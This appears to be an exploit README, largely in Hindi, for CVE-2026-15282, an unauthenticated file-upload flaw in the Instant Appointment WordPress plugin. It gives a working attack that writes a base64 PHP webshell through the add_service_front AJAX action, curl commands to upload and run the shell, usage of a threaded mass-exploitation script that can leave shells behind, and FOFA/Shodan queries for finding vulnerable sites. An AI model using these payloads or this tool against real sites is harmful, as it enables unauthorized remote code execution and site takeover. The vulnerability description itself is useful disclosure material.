
Instant Appointment <= 1.2 — add_service_front AJAX के माध्यम से बिना प्रमाणीकरण के मनमानी फ़ाइल अपलोड से RCE | CVSS 9.8
CVE-2026-15282 Instant Appointment WordPress प्लगइन (≤ 1.2) में एक गंभीर (CVSS 9.8) बिना प्रमाणीकरण वाली मनमानी फ़ाइल अपलोड भेद्यता है।
add_service_front AJAX एक्शन बिना प्रमाणीकरण वाली पहुँच के लिए wp_ajax_nopriv_ के माध्यम से पंजीकृत होता है। हैंडलर उपयोगकर्ता-आपूर्ति image_url और image_name को बिना किसी फ़ाइल प्रकार या एक्सटेंशन सत्यापन के सीधे file_get_contents() और file_put_contents() में पास करता है।
| संस्करण | स्थिति |
|---|---|
| ≤ 1.2 | असुरक्षित |
| > 1.2 | कोई पैच उपलब्ध नहीं — प्लगइन हटाएँ |
// ajax_services.php
function insapp_upload_image_as_attachment($image_url, $file_name, $product_id) {
$image_data = file_get_contents($image_url); // downloads from ANY URL
$file = $upload_dir['path'] . '/' . $file_name; // uses attacker's filename
file_put_contents($file, $image_data); // no extension check!
}
AJAX हैंडलर किसी भी image_url (जिसमें data:// URI शामिल हैं) को स्वीकार करता है और किसी भी image_name को सीधे WordPress अपलोड निर्देशिका में लिखता है।
POST /wp-admin/admin-ajax.php?action=add_service_front
image_url=data://text/plain;base64,PD9waHAgc3lzdGVt...
image_name=think_xxx.php
→ PHP webshell written to wp-content/uploads/YYYY/MM/think_xxx.php
→ RCE via https://target.com/wp-content/uploads/YYYY/MM/think_xxx.php?c=id
git clone https://github.com/shinthink/CVE-2026-15282.git
cd CVE-2026-15282
pip install -r requirements.txt
python cve_2026_15282.py -t target.com
python cve_2026_15282.py -f targets.txt -o shells.txt
python cve_2026_15282.py -t target.com --debug
python cve_2026_15282.py -t target.com --no-cleanup
-t, --target Single target
-f, --file Target list
-o, --output Save RCE URLs to file
--threads Workers (default: 25)
--no-cleanup Leave shells on target
--debug Show every request
-v, --verbose Verbose output
$ python cve_2026_15282.py -t target.com
⠋ Scanning target... → OK Scanning target...
Host : target.com
Plugin : YES
Upload : YES
RCE : YES
Shell : https://target.com/wp-content/uploads/2026/07/think_a1b2c3.php?c=id
Output : uid=33(www-data) gid=33(www-data)
[.] current-target.com | ⠋ [████░░░░░░░░░░░░░] 45/500 (9%) Plugin:12 UP:3 RCE:1
[RCE] target.com https://target.com/wp-content/uploads/2026/07/think_xxx.php
# 1. Create base64-encoded PHP shell
echo '<?php system($_GET["c"]); ?>' | base64 -w0
# 2. Upload via AJAX
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
-d 'action=add_service_front' \
-d 'service_name=test' \
-d 'image_url=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==' \
-d 'image_name=shell.php' \
-d 'image_size=100' \
-d 'image_type=image/jpeg' \
-d 'service_price_sale=1' \
-d 'service_price_reg=1' \
-d 'service_category[]=1' \
-d 'service_duration=60' \
-d 'service_author=1'
# 3. Access shell
curl -sk 'https://target.com/wp-content/uploads/2026/07/shell.php?c=id'
FOFA: body="wp-content/plugins/instant-appointment"
Shodan: http.html:"instant-appointment"
केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए।
| संसाधन | लिंक |
|---|---|
| WPScan |
tenteeglobal या Instant Appointment से संबद्ध नहीं है।
| wpscan.com/vulnerability/b3457e95 |
| Wordfence | wordfence.com |
| NVD | CVE-2026-15282 |
| शोधकर्ता | Random Robbie (What Security) |